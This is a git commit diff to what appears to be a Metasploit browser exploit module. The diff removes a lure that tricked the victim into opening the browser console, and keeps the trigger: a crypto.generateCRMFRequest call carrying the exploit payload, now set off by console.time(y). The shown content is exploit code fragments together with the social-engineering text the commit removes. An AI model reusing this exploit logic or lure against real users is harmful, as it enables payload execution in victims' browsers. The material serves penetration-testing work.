No need for web console YESSSS

bug/bundler_fix
joev 2014-08-15 16:02:26 -05:00
parent 738a295f0a
commit 694d917acc
No known key found for this signature in database
GPG Key ID: 127B05FB3E85A2B0
1 changed files with 2 additions and 7 deletions

View File

@ -56,12 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
))
register_options([
OptString.new('CONTENT', [
true,
"Content to display inside the HTML <body>.",
"An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i))"+
" ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
])
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
], self.class)
end
@ -87,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
return 5;
};
console.dir(y);
console.time(y);
</script>
#{datastore['CONTENT']}
</body>